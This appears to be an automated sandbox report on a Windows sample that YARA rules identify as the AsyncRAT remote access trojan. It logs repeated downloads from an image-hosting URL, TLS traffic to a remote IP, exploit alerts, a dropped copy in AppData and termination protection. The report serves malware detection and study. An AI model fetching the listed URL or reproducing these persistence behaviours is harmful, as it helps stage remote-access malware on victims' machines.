                  Source: Joe Sandbox ViewIP Address: 169.197.85.95 169.197.85.95
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.5:49704
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.5:49907
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: i.ibb.co
                  Source: TJXpRilNkh.exe, 00000000.00000002.3565307904.000000001C3F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                  Source: TJXpRilNkh.exe, 00000000.00000002.3559504112.000000001B4C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                  Source: TJXpRilNkh.exe, 00000000.00000002.3517801611.0000000002D92000.00000004.00000800.00020000.00000000.sdmp, TJXpRilNkh.exe, 00000000.00000002.3517801611.00000000028C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i.ibb.co
                  Source: powershell.exe, 00000002.00000002.2091422935.000002609006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2179209701.000001939006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2342865002.00000236F202D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000008.00000002.2253327874.00000236E21EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2364715103.00000236FA732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000002.00000002.2068363016.000002608022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2129493109.0000019380229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2253327874.00000236E21EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: TJXpRilNkh.exe, 00000000.00000002.3517801611.0000000002851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2068363016.0000026080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2129493109.0000019380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2253327874.00000236E1FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000002.00000002.2068363016.000002608022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2129493109.0000019380229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2253327874.00000236E21EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: Amcache.hve.19.drString found in binary or memory: http://upx.sf.net
                  Source: powershell.exe, 00000008.00000002.2253327874.00000236E21EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2364715103.00000236FA732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: TJXpRilNkh.exe, 00000000.00000002.3565307904.000000001C3F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                  Source: powershell.exe, 00000002.00000002.2068363016.0000026080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2129493109.0000019380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2253327874.00000236E1FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 00000008.00000002.2342865002.00000236F202D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000008.00000002.2342865002.00000236F202D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000008.00000002.2342865002.00000236F202D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 00000008.00000002.2253327874.00000236E21EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2364715103.00000236FA732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: TJXpRilNkh.exe, 00000000.00000002.3517801611.0000000002932000.00000004.00000800.00020000.00000000.sdmp, TJXpRilNkh.exe, 00000000.00000002.3517801611.00000000028AB000.00000004.00000800.00020000.00000000.sdmp, TJXpRilNkh.exe, 00000000.00000002.3517801611.0000000002851000.00000004.00000800.00020000.00000000.sdmp, TJXpRilNkh.exe, 00000000.00000002.3517801611.00000000028B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://i.ibb.co
                  Source: TJXpRilNkh.exe, TJXpRilNkh.exe.0.drString found in binary or memory: https://i.ibb.co/Dwrj41N/Image.png
                  Source: powershell.exe, 00000002.00000002.2091422935.000002609006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2179209701.000001939006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2342865002.00000236F202D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
                  Source: unknownHTTPS traffic detected: 169.197.85.95:443 -> 192.168.2.5:49844 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 169.197.85.95:443 -> 192.168.2.5:49936 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 169.197.85.95:443 -> 192.168.2.5:49953 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 169.197.85.95:443 -> 192.168.2.5:49954 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 169.197.85.95:443 -> 192.168.2.5:49955 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 169.197.85.95:443 -> 192.168.2.5:49956 version: TLS 1.2

                  Operating System Destruction

                  barindex
                  Protects its processes via BreakOnTermination flag
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: 01 00 00 00 Jump to behavior

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: TJXpRilNkh.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 0.0.TJXpRilNkh.exe.5f0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 00000000.00000000.2004670940.00000000005F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeCode function: 0_2_00007FF848E934F90_2_00007FF848E934F9
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeCode function: 0_2_00007FF848E916990_2_00007FF848E91699
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeCode function: 0_2_00007FF848E921C90_2_00007FF848E921C9
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeCode function: 0_2_00007FF848E9451D0_2_00007FF848E9451D
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848F630E95_2_00007FF848F630E9
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848F330E98_2_00007FF848F330E9
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeCode function: 13_2_00007FF848E6169913_2_00007FF848E61699
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeCode function: 13_2_00007FF848E60DE513_2_00007FF848E60DE5
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeCode function: 13_2_00007FF848E621C913_2_00007FF848E621C9
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeCode function: 14_2_00007FF848E7169914_2_00007FF848E71699
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeCode function: 14_2_00007FF848E70DE514_2_00007FF848E70DE5
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeCode function: 14_2_00007FF848E721C914_2_00007FF848E721C9
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeCode function: 15_2_00007FF848E8169915_2_00007FF848E81699
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeCode function: 15_2_00007FF848E821C915_2_00007FF848E821C9
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeCode function: 16_2_00007FF848E7169916_2_00007FF848E71699
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeCode function: 16_2_00007FF848E70DE516_2_00007FF848E70DE5
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeCode function: 16_2_00007FF848E721C916_2_00007FF848E721C9
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5236 -s 2964
                  Source: TJXpRilNkh.exe, 00000000.00000000.2004690548.0000000000606000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWizClient2.exe4 vs TJXpRilNkh.exe
                  Source: TJXpRilNkh.exeBinary or memory string: OriginalFilenameWizClient2.exe4 vs TJXpRilNkh.exe
                  Source: TJXpRilNkh.exe.0.drBinary or memory string: OriginalFilenameWizClient2.exe4 vs TJXpRilNkh.exe
                  Source: TJXpRilNkh.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: TJXpRilNkh.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 0.0.TJXpRilNkh.exe.5f0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 00000000.00000000.2004670940.00000000005F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: TJXpRilNkh.exe, rsSD4qMRL7xm0dmGDub2hw6w1LhtScmojnax67xqzIwo0FKmZT3Etcj6FeQCSoEBydXYwNIAzwCXXJCjOdl8.csCryptographic APIs: 'TransformFinalBlock'
                  Source: TJXpRilNkh.exe, rsSD4qMRL7xm0dmGDub2hw6w1LhtScmojnax67xqzIwo0FKmZT3Etcj6FeQCSoEBydXYwNIAzwCXXJCjOdl8.csCryptographic APIs: 'TransformFinalBlock'
                  Source: TJXpRilNkh.exe, jJs4ARMPwDPanCnddAQg6sNpSmpAFoAzudaD6PVHv3d9KQxRnbZG4r1VrYMXO85zYN8xTLyIy8b8mZlvmSao.csCryptographic APIs: 'TransformFinalBlock'
                  Source: TJXpRilNkh.exe.0.dr, rsSD4qMRL7xm0dmGDub2hw6w1LhtScmojnax67xqzIwo0FKmZT3Etcj6FeQCSoEBydXYwNIAzwCXXJCjOdl8.csCryptographic APIs: 'TransformFinalBlock'
                  Source: TJXpRilNkh.exe.0.dr, rsSD4qMRL7xm0dmGDub2hw6w1LhtScmojnax67xqzIwo0FKmZT3Etcj6FeQCSoEBydXYwNIAzwCXXJCjOdl8.csCryptographic APIs: 'TransformFinalBlock'
                  Source: TJXpRilNkh.exe.0.dr, jJs4ARMPwDPanCnddAQg6sNpSmpAFoAzudaD6PVHv3d9KQxRnbZG4r1VrYMXO85zYN8xTLyIy8b8mZlvmSao.csCryptographic APIs: 'TransformFinalBlock'
                  Source: TJXpRilNkh.exe, Nkogr82R2d1tZimBm8G0nqVzqkKSdoWqsltzj7NUlKOE0hHqLUxl3QKAOaqwg1yTYP8ZaJGeXnM23kP2D1122pVoqGVBMZgCwG4.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: TJXpRilNkh.exe, Nkogr82R2d1tZimBm8G0nqVzqkKSdoWqsltzj7NUlKOE0hHqLUxl3QKAOaqwg1yTYP8ZaJGeXnM23kP2D1122pVoqGVBMZgCwG4.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: TJXpRilNkh.exe.0.dr, Nkogr82R2d1tZimBm8G0nqVzqkKSdoWqsltzj7NUlKOE0hHqLUxl3QKAOaqwg1yTYP8ZaJGeXnM23kP2D1122pVoqGVBMZgCwG4.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: TJXpRilNkh.exe.0.dr, Nkogr82R2d1tZimBm8G0nqVzqkKSdoWqsltzj7NUlKOE0hHqLUxl3QKAOaqwg1yTYP8ZaJGeXnM23kP2D1122pVoqGVBMZgCwG4.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@18/22@1/1
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeFile created: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6364:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3184:120:WilError_03
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeMutant created: \Sessions\1\BaseNamedObjects\97VjrNIhONq9blci
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3092:120:WilError_03
                  Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5236
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6728:120:WilError_03
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
                  Source: TJXpRilNkh.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: TJXpRilNkh.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
